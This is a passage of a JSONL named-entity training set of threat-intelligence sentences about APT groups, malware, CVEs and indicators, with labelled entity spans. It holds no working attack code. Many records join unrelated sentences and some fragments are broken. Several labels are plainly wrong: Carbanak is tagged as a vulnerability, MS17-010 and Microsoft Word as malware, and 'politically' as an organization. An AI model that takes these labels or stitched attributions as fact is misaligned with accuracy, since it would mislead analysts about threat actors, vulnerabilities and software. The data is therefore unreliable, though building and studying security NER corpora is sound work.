In this blog post we provide additional information linking TEMP.Veles and their activity surrounding the TRITON intrusion to a Russian government-owned research institute .", "spans": {"ORGANIZATION: governments": [[21, 32]], "THREAT_ACTOR: Moafee": [[110, 116]], "THREAT_ACTOR: TEMP.Veles": [[248, 258]], "MALWARE: TRITON": [[294, 300]]}, "info": {"id": "cyberner_stix_train_003657", "source": "cyberner_stix_train"}} {"text": "Coded with python2.7 . works as C2 server that serve a powershell agent script when requested . i didn’t find any function to encrypt the traffic between the the agent and the C2 but there are variables with name private_key , public_key so i suspect the functions removed . its make use of HTA and bas64 encoded powershell code to bypass the AV ( right now AV can catch HTA ) .", "spans": {"TOOL: python2.7": [[11, 20]], "TOOL: C2": [[32, 34], [176, 178]], "TOOL: powershell": [[55, 65], [313, 323]], "TOOL: HTA": [[291, 294], [371, 374]], "TOOL: AV": [[343, 345], [358, 360]]}, "info": {"id": "cyberner_stix_train_003658", "source": "cyberner_stix_train"}} {"text": "Once the victim enters their account information on the landing page , the phishing attack then requests that the user log in with their email address and phone number . Rather , they likely abused the trust relationship associated with the ASA's SSL certificate to harvest VPN credentials to gain remote access to the victim's network . 
APT29 is threat group that has been attributed to the Russian government and has operated since at least 2008 .", "spans": {"THREAT_ACTOR: they": [[179, 183]], "TOOL: ASA's": [[241, 246]], "THREAT_ACTOR: APT29": [[338, 343]], "ORGANIZATION: Russian government": [[392, 410]]}, "info": {"id": "cyberner_stix_train_003659", "source": "cyberner_stix_train"}} {"text": "If found on the target system , Carbanak will try to exploit a known vulnerability in Windows XP , Windows Server 2003 , Windows Vista , Windows Server 2008 , Windows 7 , Windows 8 , and Windows Server 2012 , CVE-2013-3660 , for local privilege escalation . the backdoor is packaged together with the CVE-2013-5065 EoP exploit and heavily obfuscated .", "spans": {"VULNERABILITY: Carbanak": [[32, 40]], "VULNERABILITY: CVE-2013-3660": [[209, 222]], "VULNERABILITY: CVE-2013-5065": [[301, 314]], "TOOL: EoP": [[315, 318]], "VULNERABILITY: exploit": [[319, 326]]}, "info": {"id": "cyberner_stix_train_003660", "source": "cyberner_stix_train"}} {"text": "In the Spark campaign , the lure documents and links point to one of two file sharing websites , Egnyte or Dropbox .", "spans": {"MALWARE: Spark": [[7, 12]], "TOOL: Egnyte": [[97, 103]], "TOOL: Dropbox": [[107, 114]]}, "info": {"id": "cyberner_stix_train_003661", "source": "cyberner_stix_train"}} {"text": "n one case from 2013 , the target was sent a malicious document through a spear phishing email message . 
In early 2016 the Callisto Group began sending highly targeted spear phishing emails with malicious attachments that contained , as their final payload , the \" Scout \" malware tool from the HackingTeam RCS Galileo platform .", "spans": {"MALWARE: malicious document": [[45, 63]], "TOOL: emails": [[183, 189]], "FILEPATH: malicious attachments": [[195, 216]], "MALWARE: Scout": [[265, 270]]}, "info": {"id": "cyberner_stix_train_003662", "source": "cyberner_stix_train"}} {"text": "TG-3390 : darkhero.org .", "spans": {"THREAT_ACTOR: TG-3390": [[0, 7]], "DOMAIN: darkhero.org": [[10, 22]]}, "info": {"id": "cyberner_stix_train_003663", "source": "cyberner_stix_train"}} {"text": "Rooting and Ad Network Presentation The reflection loaded methods check if the device is rooted . We believe the actors pivoted to other systems on the network using stolen credentials and by exploiting the CVE-2017-0144 (EternalBlue) vulnerability patched in MS17-010 . It is in use by the Molerats ( aka Gaza cybergang ) , a politically motivated group whose main objective , we believe , is intelligence gathering .", "spans": {"THREAT_ACTOR: actors": [[113, 119]], "VULNERABILITY: CVE-2017-0144": [[207, 220]], "MALWARE: MS17-010": [[260, 268]], "THREAT_ACTOR: Molerats": [[291, 299]], "THREAT_ACTOR: Gaza cybergang": [[306, 320]], "ORGANIZATION: politically": [[327, 338]]}, "info": {"id": "cyberner_stix_train_003664", "source": "cyberner_stix_train"}} {"text": "Who is affected ? APT38 relies on DYEPACK , a SWIFT transaction-hijacking framework , to initiate transactions , steal money , and hide any evidence of the fraudulent transactions from the victimized bank . 
another optimizes it into blocks , The adversary may drop or create malware , tools , or other non - native files on a target system to accomplish this , potentially leaving behind traces of malicious activities .", "spans": {"THREAT_ACTOR: APT38": [[18, 23]], "TOOL: DYEPACK": [[34, 41]], "ORGANIZATION: bank": [[200, 204]], "ORGANIZATION: The adversary": [[242, 255]], "ORGANIZATION: a target system": [[324, 339]]}, "info": {"id": "cyberner_stix_train_003665", "source": "cyberner_stix_train"}} {"text": "The infection chain is slightly more roundabout in the case of Apple devices . These data sets show that APT1 is either operating in China during normal Chinese business hours or that APT1 is intentionally going to painstaking lengths to look like they are . After Glimpse starts, it checks for the existence of a directory and lock . Ego", "spans": {"SYSTEM: Apple": [[63, 68]], "THREAT_ACTOR: APT1": [[105, 109], [184, 188]], "MALWARE: Glimpse": [[265, 272]]}, "info": {"id": "cyberner_stix_train_003666", "source": "cyberner_stix_train"}} {"text": "For the TeamViewer-based activities , we have traces in the past until September 2012 . The document files exploit at least three known vulnerabilities in Microsoft Office , which we discuss in the Infection Techniques section .", "spans": {"FILEPATH: document files": [[92, 106]], "VULNERABILITY: exploit": [[107, 114]], "VULNERABILITY: vulnerabilities": [[136, 151]], "ORGANIZATION: Microsoft": [[155, 164]]}, "info": {"id": "cyberner_stix_train_003667", "source": "cyberner_stix_train"}} {"text": "Ke3chang has also leveraged a Java zero-day vulnerability ( CVE-2012-4681 ) , as well as older , reliable exploits for Microsoft Word ( CVE-2010-3333 ) and Adobe PDF Reader ( CVE-2010-2883 ) . 
Traffic was intercepted on a node between the end machine and the Adobe servers , allowing Turla 's operators to replace the legitimate Flash executable with a trojanized version .", "spans": {"THREAT_ACTOR: Ke3chang": [[0, 8]], "VULNERABILITY: Java zero-day vulnerability": [[30, 57]], "VULNERABILITY: CVE-2012-4681": [[60, 73]], "MALWARE: Microsoft Word": [[119, 133]], "VULNERABILITY: CVE-2010-3333": [[136, 149]], "TOOL: Adobe PDF Reader": [[156, 172]], "VULNERABILITY: CVE-2010-2883": [[175, 188]], "THREAT_ACTOR: Turla": [[284, 289]]}, "info": {"id": "cyberner_stix_train_003668", "source": "cyberner_stix_train"}} {"text": "Investigation of this domain led to additional domains that appear to have been registered for use with the campaign , but are not in use yet . In April 2017 , APT37 targeted South Korean military and government organizations with the DOGCALL backdoor and RUHAPPY wiper malware . After checking that the malware is not already installed , it unpacks HCK.cab using the Microsoft standard utility expand.exe . Who is the Winnti group ?", "spans": {"THREAT_ACTOR: APT37": [[160, 165]], "ORGANIZATION: military": [[188, 196]], "ORGANIZATION: government organizations": [[201, 225]], "TOOL: DOGCALL backdoor": [[235, 251]], "TOOL: RUHAPPY wiper malware": [[256, 277]], "FILEPATH: HCK.cab": [[350, 357]], "ORGANIZATION: Microsoft": [[368, 377]], "FILEPATH: expand.exe": [[395, 405]], "THREAT_ACTOR: Winnti group": [[419, 431]]}, "info": {"id": "cyberner_stix_train_003669", "source": "cyberner_stix_train"}} {"text": "From the first cluster on the left , if we sort by incoming links per node a pattern stands out in the domain names looking similar to the previously mentioned Nymaim ones .", "spans": {"MALWARE: Nymaim": [[160, 166]]}, "info": {"id": "cyberner_stix_train_003670", "source": "cyberner_stix_train"}} {"text": "The group primarily deploys spear-phishing e-mails to infect its targets , but was also responsible for a watering hole attack in 2013 . 
Although most malware today either seeks monetary gain or conducts espionage for economic advantage , both of these activity groups appear to seek information about specific individuals .", "spans": {"THREAT_ACTOR: group": [[4, 9]], "ORGANIZATION: economic": [[218, 226]], "THREAT_ACTOR: activity groups": [[253, 268]], "ORGANIZATION: specific individuals": [[302, 322]]}, "info": {"id": "cyberner_stix_train_003671", "source": "cyberner_stix_train"}} {"text": "Shellbot is also used to control the botnet , with a command that is sent and run from the C&C to determine if there is a code execution in the shell , the hostname , and its architecture .", "spans": {"MALWARE: Shellbot": [[0, 8]], "TOOL: C&C": [[91, 94]]}, "info": {"id": "cyberner_stix_train_003672", "source": "cyberner_stix_train"}} {"text": "The threat actors use custom batch scripts to create a list of files with predefined criteria and collate the identified files into a .rar archive ( see Figure 9 ) .", "spans": {"FILEPATH: .rar": [[134, 138]]}, "info": {"id": "cyberner_stix_train_003673", "source": "cyberner_stix_train"}} {"text": "Bundling decoy documents is a common tactic by this group .", "spans": {}, "info": {"id": "cyberner_stix_train_003674", "source": "cyberner_stix_train"}} {"text": "TA505 introduced Locky ransomware in February 2016 .", "spans": {"THREAT_ACTOR: TA505": [[0, 5]], "MALWARE: Locky": [[17, 22]]}, "info": {"id": "cyberner_stix_train_003675", "source": "cyberner_stix_train"}} {"text": "If the main C2 domain is not responsive , the bot fetches a backup C2 domain from a Twitter account . Based on observed activity , we judge that APT38 's primary mission is targeting financial institutions and manipulating inter-bank financial systems to raise large sums of money for the North Korean regime . a switch statement is called in an infinite loop having multiple code blocks each performing operations . 
Monitor systems with access to OT resources for the creation of legitimate temporary folders , files , artifacts , and external libraries required as evidence of the execution of packaged Python scripts .", "spans": {"ORGANIZATION: Twitter": [[84, 91]], "THREAT_ACTOR: APT38": [[145, 150]], "ORGANIZATION: financial institutions": [[183, 205]]}, "info": {"id": "cyberner_stix_train_003676", "source": "cyberner_stix_train"}} {"text": "Catchamas is a custom Trojan designed to steal information from an infected computer and contains additional features designed to avoid detection . We noticed that criminals were spreading Buhtrap using this method from May 2015 to August 2015 .", "spans": {"MALWARE: Catchamas": [[0, 9]], "THREAT_ACTOR: Buhtrap": [[189, 196]]}, "info": {"id": "cyberner_stix_train_003677", "source": "cyberner_stix_train"}} {"text": "] 117:8080/api/v1/report/records.php hxxp : //88.99.227 [ . Our recent report , \" The Chronicles of the Hellsing APT : the Empire Strikes Back \" began with an introduction to the Naikon APT , describing it as \" One of the most active APTs in Asia , especially around the South China Sea \" . Additionally , Rancor is also using the Derusbi malware family to load a secondary payload once it infiltrates a target . 
PBI Research Services also reported a data breach that exposed information for 4.75 million people .", "spans": {"THREAT_ACTOR: Hellsing APT": [[104, 116]], "TOOL: Empire Strikes Back": [[123, 142]], "THREAT_ACTOR: Naikon APT": [[179, 189]], "THREAT_ACTOR: Rancor": [[306, 312]], "MALWARE: Derusbi": [[331, 338]], "ORGANIZATION: PBI Research Services": [[413, 434]]}, "info": {"id": "cyberner_stix_train_003678", "source": "cyberner_stix_train"}} {"text": "Unit 42 actively monitors this group due to their persistent nature globally across all industry verticals .", "spans": {"ORGANIZATION: Unit 42": [[0, 7]]}, "info": {"id": "cyberner_stix_train_003679", "source": "cyberner_stix_train"}} {"text": "The ISCHECKIP and INSTARTUPFOLDER are not found in open source Quasar samples .", "spans": {"MALWARE: ISCHECKIP": [[4, 13]], "MALWARE: INSTARTUPFOLDER": [[18, 33]], "MALWARE: Quasar": [[63, 69]]}, "info": {"id": "cyberner_stix_train_003680", "source": "cyberner_stix_train"}} {"text": "This powerful backdoor can receive commands from the attackers , enabling it to exfiltrate files from the system it is running on , execute additional scripts , delete files , and more . Confucius' operations include deploying bespoke backdoors and stealing files from their victim 's systems with tailored file stealers , some of which bore resemblances to Patchwork 's .", "spans": {"MALWARE: backdoor": [[14, 22]], "THREAT_ACTOR: Patchwork": [[355, 364]]}, "info": {"id": "cyberner_stix_train_003681", "source": "cyberner_stix_train"}} {"text": "The host is possibly related to attacks that served the Pupy RAT , a publicly available cross-platform remote access tool .", "spans": {"TOOL: Pupy RAT": [[56, 64]]}, "info": {"id": "cyberner_stix_train_003682", "source": "cyberner_stix_train"}} {"text": "In mid-November , Mandiant , a FireEye company , responded to the first Shamoon 2.0 incident against an organization located in the Gulf states . 
Some of the exploit server paths contain modules that appear to have been designed to infect Linux computers , but we have not yet located the Linux backdoor .", "spans": {"ORGANIZATION: Mandiant": [[18, 26]], "ORGANIZATION: FireEye": [[31, 38]], "VULNERABILITY: exploit": [[158, 165]], "SYSTEM: Linux": [[239, 244], [289, 294]]}, "info": {"id": "cyberner_stix_train_003683", "source": "cyberner_stix_train"}} {"text": "Allows applications to change Wi-Fi connectivity state . These techniques permit the CIA to bypass the encryption of WhatsApp , Signal , Telegram , Wiebo , Confide and Cloackman by hacking the smart phones that they run on and collecting audio and message traffic before encryption is applied . The group has mainly targeted victims in the defense , military , and government sectors .", "spans": {"THREAT_ACTOR: CIA": [[85, 88]]}, "info": {"id": "cyberner_stix_train_003685", "source": "cyberner_stix_train"}} {"text": "One of the attacks we investigated provided detailed insight into how Suckfly conducts its operations .", "spans": {"THREAT_ACTOR: Suckfly": [[70, 77]]}, "info": {"id": "cyberner_stix_train_003686", "source": "cyberner_stix_train"}} {"text": "The latest of these campaigns that we are aware of occurred during the spring and early summer of 2015 .", "spans": {}, "info": {"id": "cyberner_stix_train_003687", "source": "cyberner_stix_train"}} {"text": "As a modern Android spyware it is also capable of exfiltrating data from messaging applications ( WhatsApp , Viber , Facebook ) . The use of decoy documents also reveals some of the potential targets of the Lazarus group 's malicious activity , specifically the use spear phishing attacks observed targeting South Korean government and aerospace organizations . On February 12 , 2018 at 16:45 ( all times are in the organization’s local time ) , an email was sent to the organization advertising a job vacancy at an American global service provider . 
The collective ’s activity also supports domestic Russian promotion of support for the war .", "spans": {"SYSTEM: WhatsApp": [[98, 106]], "SYSTEM: Viber": [[109, 114]], "SYSTEM: Facebook": [[117, 125]], "TOOL: decoy documents": [[141, 156]], "THREAT_ACTOR: Lazarus group": [[207, 220]], "ORGANIZATION: government": [[321, 331]], "ORGANIZATION: aerospace organizations": [[336, 359]], "TOOL: email": [[449, 454]]}, "info": {"id": "cyberner_stix_train_003688", "source": "cyberner_stix_train"}} {"text": "This assertion is based on the oldest currently known sample of another Duke related toolset , GeminiDuke , which was compiled on the 26th of January 2009 .", "spans": {"THREAT_ACTOR: Duke": [[72, 76]], "MALWARE: GeminiDuke": [[95, 105]]}, "info": {"id": "cyberner_stix_train_003689", "source": "cyberner_stix_train"}} {"text": "This enables it to launch malicious apps without the user ’ s awareness and explicit consent . Currently , Sofacy targets large air-defense related commercial organizations in China with SPLM , and moves Zebrocy focus across Armenia , Turkey , Kazahkstan , Tajikistan , Afghanistan , Mongolia , China , and Japan . The client establishes a new connection with the remote command and control server hosted on a Bulgarian remote host 217.12.201.159 , part of a Virtual Dedicated Server subnet of the AS-21100, operated by ITL LLC .", "spans": {"IP_ADDRESS: 217.12.201.159": [[432, 446]], "TOOL: Virtual Dedicated Server": [[459, 483]], "TOOL: ITL": [[520, 523]], "TOOL: LLC": [[524, 527]]}, "info": {"id": "cyberner_stix_train_003690", "source": "cyberner_stix_train"}} {"text": "So , users should beware of certain modified Android firmware . These instances of Gh0st RAT are consistently controlled from commercial Internet access accounts located on the island of Hainan , People's Republic of China . 
Once APT1 has established access , they periodically revisit the victim ’s network over several months or years and steal broad categories of intellectual property , including technology blueprints , proprietary manufacturing processes , test results , business plans , pricing documents , partnership agreements , and emails and contact lists from victim organizations ’ leadership . It uses a vulnerability discovered at the end December 2012 , CVE-2012 - 4792 .", "spans": {"SYSTEM: Android": [[45, 52]], "TOOL: Gh0st RAT": [[83, 92]], "THREAT_ACTOR: APT1": [[230, 234]], "TOOL: emails": [[544, 550]], "VULNERABILITY: CVE-2012 - 4792": [[672, 687]]}, "info": {"id": "cyberner_stix_train_003691", "source": "cyberner_stix_train"}} {"text": "Zen apps gain access to root permissions from a rooting trojan in its infection chain . Group-IB reports that MoneyTaker uses both borrowed and their own self-written tools . Each phishing message contained the same malicious Microsoft Word attachment . This was likely to establish both persistence and secondary access , as in other environments .", "spans": {"MALWARE: Zen": [[0, 3]], "ORGANIZATION: Group-IB": [[88, 96]], "ORGANIZATION: Microsoft": [[226, 235]], "TOOL: Word": [[236, 240]]}, "info": {"id": "cyberner_stix_train_003692", "source": "cyberner_stix_train"}} {"text": "com.db.mobilebanking com.botw.mobilebanking com.fg.wallet com.sbi.SBISecure com.icsfs.safwa com.interswitchng.www com.dhanlaxmi.dhansmart.mtc com.icomvision.bsc.tbc hr.asseco.android.jimba.cecro com.vanso.gtbankapp com.fss.pnbpsp com.mfino.sterling cy.com.netinfo.netteller.boc ge.mobility.basisbank com.snapwork.IDBI In particular , we noticed that the Naikon group was spear-phished by an actor we now call \" Hellsing \" . Gamaredon has been active since 2014 , and during this time , the modus operandi has remained almost the same . 
The lure contains a payment instruction form containing VBA code , which appears to have been sent from the State Treasury Service of Ukraine .", "spans": {"THREAT_ACTOR: Naikon group": [[354, 366]], "THREAT_ACTOR: actor": [[391, 396]], "THREAT_ACTOR: Hellsing": [[411, 419]], "THREAT_ACTOR: Gamaredon": [[424, 433]], "ORGANIZATION: the State Treasury Service of Ukraine": [[640, 677]]}, "info": {"id": "cyberner_stix_train_003693", "source": "cyberner_stix_train"}} {"text": "This IP has been used to host a small number of domains , some of which were registered by the same actor , suggesting the IP is dedicated for a single individual or group ’s use .", "spans": {}, "info": {"id": "cyberner_stix_train_003694", "source": "cyberner_stix_train"}} {"text": "PLATINUM primarily targets its intended victims using spear phishing . There are a number of factors in these groups' campaigns that suggests that the attackers may be based in Iran .", "spans": {"THREAT_ACTOR: PLATINUM": [[0, 8]]}, "info": {"id": "cyberner_stix_train_003695", "source": "cyberner_stix_train"}} {"text": "] cendata [ . MoneyTaker has primarily been targeting card processing systems , including the AWS CBR ( Russian Interbank System ) and purportedly SWIFT ( US ) . We analyzed a recent sample that appears to have targeted entities in Taiwan , a target consistent with previous Ixeshe activity . Beginning in January 2021 , Mandiant Managed Defense observed the creation of web shells on one Microsoft Exchange server file system within a customer ’s environment .", "spans": {"MALWARE: Ixeshe": [[275, 281]], "ORGANIZATION: Mandiant Managed Defense": [[321, 345]]}, "info": {"id": "cyberner_stix_train_003696", "source": "cyberner_stix_train"}} {"text": "Many groups leverage the regsvr32.exe application whitelisting bypass , including APT19 in their 2017 campaign against law firms . 
APT39 's focus on the telecommunications and travel industries suggests intent to perform monitoring , tracking , or surveillance operations against specific individuals , collect proprietary or customer data for commercial or operational purposes that serve strategic requirements related to national priorities , or create additional accesses and vectors to facilitate future campaigns .", "spans": {"MALWARE: regsvr32.exe": [[25, 37]], "THREAT_ACTOR: APT19": [[82, 87]], "ORGANIZATION: law firms": [[119, 128]], "THREAT_ACTOR: APT39": [[131, 136]], "ORGANIZATION: telecommunications and travel industries": [[153, 193]], "ORGANIZATION: specific individuals": [[280, 300]]}, "info": {"id": "cyberner_stix_train_003697", "source": "cyberner_stix_train"}} {"text": "The documents shared the same themes for lures but the VBA macro and resulting PowerShell were more along the lines of what I expected .", "spans": {"TOOL: VBA macro": [[55, 64]], "TOOL: PowerShell": [[79, 89]]}, "info": {"id": "cyberner_stix_train_003698", "source": "cyberner_stix_train"}} {"text": "ed234e61849dcb95223676abe2312e1378d6130c0b00851d82cda545b946ec83 27410d4019251a70d38f0635277f931fb73f67ac9f2e1f3b475ce680ebfde12a 6e6c210535b414c5aa2dd9e67f5153feeb43a8ac8126d8e249e768f501323a3e 4a32ced20df7001da7d29edc31ca76e13eef0c9b355f62c44888853435e9794f In the second set they are making use of a dynamic DNS service by ChangeIP.com . The new campaigns mark the first significant stirrings from the group since it went silent in January in the wake of a detailed expose of the group and its exploits — and a retooling of what security researchers believe is a massive spying operation based in China . 
FakeSG has different browser templates depending on which browser the victim is running .", "spans": {"TOOL: dynamic DNS service": [[303, 322]]}, "info": {"id": "cyberner_stix_train_003699", "source": "cyberner_stix_train"}} {"text": "HenBox Roosts HenBox has evolved over the past three years , and of the almost two hundred HenBox apps in AutoFocus , the vast majority contain several native libraries as well as other components in order to achieve their objective . In 2014 , APT41 was observed carrying out espionage campaigns concurrently with financially motivated intrusions , demonstrating that they could balance different objectives simultaneously . We believe that APT28 's targeting of the MOD aligns with Russian threat perceptions .", "spans": {"MALWARE: HenBox": [[0, 6], [14, 20], [91, 97]], "THREAT_ACTOR: APT41": [[245, 250]], "THREAT_ACTOR: APT28": [[442, 447]]}, "info": {"id": "cyberner_stix_train_003700", "source": "cyberner_stix_train"}} {"text": "Use of obfuscated malicious macro code .", "spans": {"TOOL: malicious macro code": [[18, 38]]}, "info": {"id": "cyberner_stix_train_003701", "source": "cyberner_stix_train"}} {"text": "File Name : Joint Ministerial Council between the GCC and the EU Council.exe ” .", "spans": {"FILEPATH: Joint Ministerial Council between the GCC and the EU Council.exe": [[12, 76]]}, "info": {"id": "cyberner_stix_train_003702", "source": "cyberner_stix_train"}} {"text": "It contains a Word document in plaintext ( written to Bienvenue_a_Sahaja_Yoga_Toulouse.doc ) , along with an executable ( Update.exe ) and DLL ( McUpdate.dll ) . 
The Trojan is quite similar to the .NET RocketMan Trojan and can handle the same commands; additionally , it includes the #screen” command to take a screenshot .", "spans": {"MALWARE: Word document": [[14, 27]], "MALWARE: Bienvenue_a_Sahaja_Yoga_Toulouse.doc": [[54, 90]], "MALWARE: Update.exe": [[122, 132]], "MALWARE: McUpdate.dll": [[145, 157]], "FILEPATH: Trojan": [[166, 172]], "FILEPATH: .NET RocketMan Trojan": [[197, 218]]}, "info": {"id": "cyberner_stix_train_003703", "source": "cyberner_stix_train"}} {"text": "Victims have also been observed in Western Europe , Brazil , China , Japan , Mexico , New Zealand , South Korea , Turkey and Central Asian countries .", "spans": {}, "info": {"id": "cyberner_stix_train_003704", "source": "cyberner_stix_train"}} {"text": "Figure 12 : Boot module After the patch module is extracted , the “ boot ” module executes it , using the same method described in the “ loader ” module . In other words , the attackers attracted our attention by attempting to exploit Kaspersky Lab products . This method has the additional benefit of being fileless : the code can be run without actually being saved on the file system . Fake browser updates are a very common decoy used by malware authors .", "spans": {"TOOL: Kaspersky Lab products": [[235, 257]], "MALWARE: Fake browser updates": [[389, 409]], "THREAT_ACTOR: malware authors": [[442, 457]]}, "info": {"id": "cyberner_stix_train_003705", "source": "cyberner_stix_train"}} {"text": "Extract messages and the encryption key from the Telegram app . Symantec will continue to search for more Remsec modules and targets in order to build upon our understanding of Strider and better protect our customers . Perpetrated by an Arabic-speaking APT , MoleRATs : The modus-operandi of the attackers as well as the social engineering decoy content seem aligned with previous attacks carried out by an Arabic-speaking APT group called MoleRATs ( aka Gaza Cybergang ) . 
.bat \"", "spans": {"SYSTEM: Telegram": [[49, 57]], "ORGANIZATION: Symantec": [[64, 72]], "TOOL: Remsec modules": [[106, 120]], "THREAT_ACTOR: Strider": [[177, 184]], "THREAT_ACTOR: MoleRATs": [[260, 268], [441, 449]], "THREAT_ACTOR: Gaza Cybergang": [[456, 470]]}, "info": {"id": "cyberner_stix_train_003706", "source": "cyberner_stix_train"}} {"text": "which was leaked last year . In 2018 , Silence conducted test campaigns to update their database of current targets and expand their attack geography . To reduce the risk of losing access to the internal bank network , the Carbanak , in addition to malicious programs , also used for remote access legitimate programs such as Ammy Admin and Team Viewer .", "spans": {"THREAT_ACTOR: Silence": [[39, 46]], "MALWARE: Carbanak": [[223, 231]], "MALWARE: Ammy Admin": [[326, 336]], "MALWARE: Team Viewer": [[341, 352]]}, "info": {"id": "cyberner_stix_train_003708", "source": "cyberner_stix_train"}} {"text": "TG-4127 exploited the Hillary for America campaign's use of Gmail and leveraged campaign employees' expectation of the standard Gmail login page to access their email account .", "spans": {"THREAT_ACTOR: TG-4127": [[0, 7]], "TOOL: Gmail": [[60, 65], [128, 133]], "TOOL: email": [[161, 166]]}, "info": {"id": "cyberner_stix_train_003709", "source": "cyberner_stix_train"}} {"text": "User messages created by the Trojan during installation typically contain grammatical and spelling errors , and use a mixture of Cyrillic and Latin characters . CTU researchers discovered the threat actors searching for \" [company] login \" , which directed them to the landing page for remote access . By shaping the attack , the group may be able to create niches in the underground , catering to the specific needs of their customers . 
Will Harrison was terminated as an Ashley Madison employee in November 2011 , and by early 2012 he ’d turned his considerable harassment skills squarely against the company .", "spans": {"ORGANIZATION: CTU": [[161, 164]], "THREAT_ACTOR: Will Harrison": [[438, 451]], "ORGANIZATION: Ashley Madison": [[473, 487]]}, "info": {"id": "cyberner_stix_train_003710", "source": "cyberner_stix_train"}} {"text": "Users can see a “ Profile Downloaded ” added in their settings ( this feature is in iOS 12.2 , but not on iOS 12.1.1 ) . On November 26 , 2015 , a suspected China-based APT group sent Japanese defense policy-themed spear phishing emails to multiple Japanese financial and high-tech companies . This query is depicted below: 39e9D60005eca60000BCC64T.sample-domain.evil In the case of our sample traffic, the server responded with the following TXT resource record data: . Although KillMilk claims the activity was by their own group , the previous operations of Universal Dark Service targeted the Russian government and were critical of its actions .", "spans": {"SYSTEM: iOS 12.2": [[84, 92]], "SYSTEM: iOS 12.1.1": [[106, 116]], "THREAT_ACTOR: APT group": [[169, 178]], "ORGANIZATION: financial": [[258, 267]], "ORGANIZATION: high-tech companies": [[272, 291]], "FILEPATH: 39e9D60005eca60000BCC64T.sample-domain.evil": [[324, 367]], "THREAT_ACTOR: KillMilk": [[480, 488]], "ORGANIZATION: the Russian government": [[593, 615]]}, "info": {"id": "cyberner_stix_train_003711", "source": "cyberner_stix_train"}} {"text": "The SectorJ04 group mainly utilizes a spear phishing email with MS Word or Excel files attached , and the document files downloads the Microsoft Installer (MSI) installation file from the attacker server and uses it to install backdoor on the infected system . 
The backdoor was delivered via a malicious .rtf file that exploited CVE-2017-0199 .", "spans": {"THREAT_ACTOR: SectorJ04": [[4, 13]], "MALWARE: document files": [[106, 120]], "THREAT_ACTOR: attacker": [[188, 196]], "FILEPATH: .rtf file": [[304, 313]], "VULNERABILITY: CVE-2017-0199": [[329, 342]]}, "info": {"id": "cyberner_stix_train_003712", "source": "cyberner_stix_train"}} {"text": "Germany 's Der Spiegel re-published the slide set with far less deletions recently , in January 2015 , and therefore gave a deeper insight about what CSEC actually says they have tracked down . In early May , the phishing lures leveraged RTF attachments that exploited the Microsoft Windows vulnerability described in CVE-2017-0199 .", "spans": {"ORGANIZATION: Der Spiegel": [[11, 22]], "TOOL: RTF": [[238, 241]], "ORGANIZATION: Microsoft": [[273, 282]], "SYSTEM: Windows": [[283, 290]], "VULNERABILITY: CVE-2017-0199": [[318, 331]]}, "info": {"id": "cyberner_stix_train_003713", "source": "cyberner_stix_train"}} {"text": "Back in February 2016 , Indian army officials issued a warning against the usage of three apps , WeChat , SmeshApp , and Line , fearing that these apps collected too much information if installed on smartphones used by Indian army personnel . 
The document , when opened , used an embedded ActiveX control to download a JavaScript file from a remote site that used a previously unknown vulnerability in some versions of Windows ( later designated CVE-2013-7331 ) to read information about the browser 's installed components .", "spans": {"ORGANIZATION: army officials": [[31, 45]], "TOOL: WeChat": [[97, 103]], "TOOL: SmeshApp": [[106, 114]], "TOOL: Line": [[121, 125]], "ORGANIZATION: army personnel": [[226, 240]], "MALWARE: ActiveX control": [[289, 304]], "FILEPATH: JavaScript file": [[319, 334]], "SYSTEM: Windows": [[419, 426]], "VULNERABILITY: CVE-2013-7331": [[446, 459]]}, "info": {"id": "cyberner_stix_train_003714", "source": "cyberner_stix_train"}} {"text": "Command and Control T1437 Standard Application Layer Protocol Uses Firebase Cloud Messaging for C & C . Waterbug’s intrusions on the victim’s network continued for much of 2018 . During this time it has managed to avoid scrutiny by the security community .", "spans": {"THREAT_ACTOR: Waterbug’s": [[104, 114]]}, "info": {"id": "cyberner_stix_train_003715", "source": "cyberner_stix_train"}} {"text": "Below is a fragment of such a log : Log with specified command Log files can be uploaded to the FTP server and sent to the attacker ’ s email inbox . Lazarus used watering hole attacks to compromise legitimate and trusted websites frequently visited by their targets . APT33 : f2943f5e45befa52fb12748ca7171d30096e1d4fc3c365561497c618341299d5 S-SHA2 Gpppassword . 
In at least one instance , the malicious code was a lightweight Ruby script that was executed via the JumpCloud agent .", "spans": {"THREAT_ACTOR: Lazarus": [[150, 157]], "THREAT_ACTOR: APT33": [[269, 274]], "MALWARE: f2943f5e45befa52fb12748ca7171d30096e1d4fc3c365561497c618341299d5 S-SHA2 Gpppassword": [[277, 360]]}, "info": {"id": "cyberner_stix_train_003716", "source": "cyberner_stix_train"}} {"text": "The phishing page is translated in Korean , Japanese , Chinese , and English , which are hardcoded in the payload . Earworm first came to light in 2016 , when they managed to steal sensitive information from the US Democratic National Committee (DNC) . Anyway , just before the kill loop , the real malicious payload is executed : the", "spans": {"THREAT_ACTOR: Earworm": [[116, 123]], "ORGANIZATION: (DNC)": [[245, 250]]}, "info": {"id": "cyberner_stix_train_003717", "source": "cyberner_stix_train"}} {"text": "While the application is in the background , although the service is already running , the beaconing will not start . There was a mistake in the original Morphisec analysis which linked these attacks to FIN7 . Hashes for tmp.vbs :b 958e481c90939962081b9fb85451a2fb28f705d5b5060f5d9d5aebfb390f8 . 
Cisco Talos recently worked with two vendors to patch multiple vulnerabilities in a favored software library used in chemistry laboratories and the Foxit PDF Reader , one of the most popular PDF reader alternatives to Adobe Acrobat .", "spans": {"ORGANIZATION: Morphisec": [[154, 163]], "THREAT_ACTOR: FIN7": [[203, 207]], "FILEPATH: tmp.vbs": [[221, 228]], "FILEPATH: :b 958e481c90939962081b9fb85451a2fb28f705d5b5060f5d9d5aebfb390f8": [[229, 293]], "ORGANIZATION: Cisco Talos": [[296, 307]], "TOOL: Foxit PDF Reader": [[444, 460]], "TOOL: Adobe Acrobat": [[514, 527]]}, "info": {"id": "cyberner_stix_train_003718", "source": "cyberner_stix_train"}} {"text": "If the malware obtains device administrator rights , it will be able to lock the screen by itself , expire the password , and resist being uninstalled through normal methods . Similarly , APT37 targeting of a Middle Eastern company in 2017 is also consistent with North Korean objectives given the entity 's extensive relationships inside North Korea . The Remexi malware has been associated with an APT actor called Chafer by Symantec . As more actors enter this space , Cisco Talos is seeing an increasing number of ransomware variants emerge , leading to more frequent attacks and new challenges for cybersecurity professionals , particularly regarding actor attribution .", "spans": {"THREAT_ACTOR: APT37": [[188, 193]], "ORGANIZATION: company": [[224, 231]], "MALWARE: Remexi": [[357, 363]], "THREAT_ACTOR: Chafer": [[417, 423]], "ORGANIZATION: Symantec": [[427, 435]], "ORGANIZATION: Cisco Talos": [[472, 483]], "ORGANIZATION: cybersecurity professionals": [[603, 630]]}, "info": 